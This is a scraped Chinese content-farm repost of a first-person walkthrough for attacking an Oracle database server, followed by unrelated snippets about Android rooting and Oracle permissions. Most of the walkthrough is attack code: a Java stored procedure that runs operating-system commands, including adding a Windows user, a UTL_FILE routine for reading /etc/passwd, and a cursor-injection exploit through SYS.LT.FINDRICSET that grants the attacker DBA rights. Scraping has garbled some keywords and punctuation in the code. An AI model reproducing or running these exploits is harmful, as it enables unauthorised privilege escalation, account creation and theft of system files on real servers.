知识大全 入侵Oracle服务器进一步获取权限
Posted 权限
篇首语:知识的确是天空中伟大的太阳,它那万道光芒投下了生命,投下了力量。本文由小常识网(cha138.com)小编为大家整理,主要介绍了知识大全 入侵Oracle服务器进一步获取权限相关的知识,希望对你有一定的参考价值。
入侵Oracle服务器进一步获取权限 以下文字资料是由(全榜网网www.cha138.com)小编为大家搜集整理后发布的内容,让我们赶快一起来看一下吧!
很快便连接上oracle服务器 此时发现
连接后不是dba权限
不能利用SYS DBMS_EXPORT_EXTENSION GET_DOMAIN_INDEX_TABLES漏洞提升权限
运行SELECT UTL_HTTP request( ) FROM dual 后发现oracle服务器不能连接网络
幸运的是
运行
create or replace function Linx_Query (p varchar ) return number authid current_user is begin execute immediate p; return ;end;
成功!这个用户具有create proceduce权限
此时马上想到创建java扩展执行命令
create or replace and pile java source named LinxUtil as import java io *; public class LinxUtil extends Object public static String runCMD(String args) tryBufferedReader myReader= new BufferedReader(new InputStreamReader( Runtime getRuntime() exec(args) getInputStream() ) ); String stemp str= ;while ((stemp = myReader readLine()) != null) str +=stemp+ ;myReader close();return str; catch (Exception e)return e toString();
begin dbms_java grant_permission( PUBLIC SYS:java io FilePermission <> execute );end;
create or replace function LinxRunCMD(p_cmd in varchar ) return varchar as language java name LinxUtil runCMD(java lang String) return String
select * from all_objects where object_name like %LINX%
grant all on LinxRunCMD to public
select LinxRunCMD( cmd /c net user linx /add ) from dual
但是在第一步就卡住了 服务器由于某种未知原因 不能创建java扩展!!
还好 我们还有UTL库可以利用
create or replace function LinxUTLReadfile (filename varchar ) return varchar is
fHandler UTL_FILE FILE_TYPE;
buf varchar ( );
output varchar ( );
BEGIN
fHandler := UTL_FILE FOPEN( UTL_FILE_DIR filename r );
loop
begin
utl_file get_line(fHandler buf);
DBMS_OUTPUT PUT_LINE( Cursor: ||buf);
exception
when no_data_found then exit;
end;
output := output||buf||chr( );
end loop;
UTL_FILE FCLOSE(fHandler);
return output;
END;
UTL_FILE_DIR需要先用
CREATE OR REPLACE DIRECTORY UTL_FILE_DIR AS /etc ;
指定目 但运行后发现没有权限 只好想办法提权
***************游标注射***************
老外写了N个pdf介绍这技术 我精简了代码
DECLARE
MYC NUMBER;
BEGIN
MYC := DBMS_SQL OPEN_CURSOR;
DBMS_SQL PARSE(MYC declare pragma autonomous_transaction; begin execute immediate GRANT DBA TO linxlinx_current_db_user ;mit;end; );
DBMS_OUTPUT PUT_LINE( Cursor: ||MYC);
BEGIN SYS LT FINDRICSET( ||dbms_sql execute( ||MYC|| )|| )– x ); END;
raise NO_DATA_FOUND;
EXCEPTION
WHEN NO_DATA_FOUND THEN DBMS_OUTPUT PUT_LINE( Cursor: ||MYC);
WHEN OTHERS THEN DBMS_OUTPUT PUT_LINE( Cursor: ||MYC);
END;
运行后重新连接就有dba权限了 简单吧……
现在可以读取文件了
CREATE OR REPLACE DIRECTORY UTL_FILE_DIR AS /etc ;
select LinxUTLReadfile( passwd ) from dual
cha138/Article/program/Oracle/201311/16747相关参考
MSSQL数据库SA权限入侵的感悟 以下文字资料是由(全榜网网www.cha138.com)小编为大家搜集整理后发布的内容,让我们赶快一起来看一下吧! 想必大家都知道
PHP获取文件权限函数介绍 以下文字资料是由(全榜网网www.cha138.com)小编为大家搜集整理后发布的内容,让我们赶快一起来看一下吧!以下是对PHP中的获取文件
华为荣耀畅玩4如何获取root权限?如何禁止软件自启和卸载预装软件?很简单,下一个PC版的应用宝来弄就好了。具体方法也告诉你,下了后,打开,然后把手机连到电脑,它能自动识别你的手机,就在应用宝页面右下
知识大全 我的华为3x手机有4个病毒 还不能卸载权限也获取不了该怎么办
我的华为3x手机有4个病毒还不能卸载权限也获取不了该怎么办?华为手机获取ROOT权限后,无法正常卸载预装软件,一般是权限不足导致的,手机自带的系统软件都是存在于系统分区中的,因此不能使用一般的方式卸载
知识大全 手机获取root权限后恢复出厂设置开不了机如何恢复
手机获取root权限后恢复出厂设置开不了机如何恢复1、首先在电脑上下载并安装好AndroidSDK程序,具体下载地址和安装配置方法请直接上AndroidSDK官网;2、将USB数据线将手机连接到电脑上
Oracle角色权限管理 以下文字资料是由(全榜网网www.cha138.com)小编为大家搜集整理后发布的内容,让我们赶快一起来看一下吧! 对于Oracle系统管理
知识大全 我的手机是红米note移动4G增强版,为什么获取root权限失败
我的手机是红米note移动4G增强版,为什么获取root权限失败?哪位大神知道! 以下文字资料是由(历史新知网www.cha138.com)小编为大家搜集整理后发布的内容,让我们
Oracle用户权限查询 以下文字资料是由(全榜网网www.cha138.com)小编为大家搜集整理后发布的内容,让我们赶快一起来看一下吧! 查看所有用户 sele
知识大全 安卓系统7.0,怎么获取root权限。试了好多次root软件,一个都不行,为什么
安卓系统7.0,怎么获取root权限。试了好多次root软件,一个都不行,为什么稳定点的root软件就可以对手机root。电脑上的应用宝可可以帮忙对手机root。usb调试打开后,使用数据线把手机连接
Sql代码 createuserusernameidentifiedbypassword; 创建用户 grantdbatousername; 权限 dropuseruse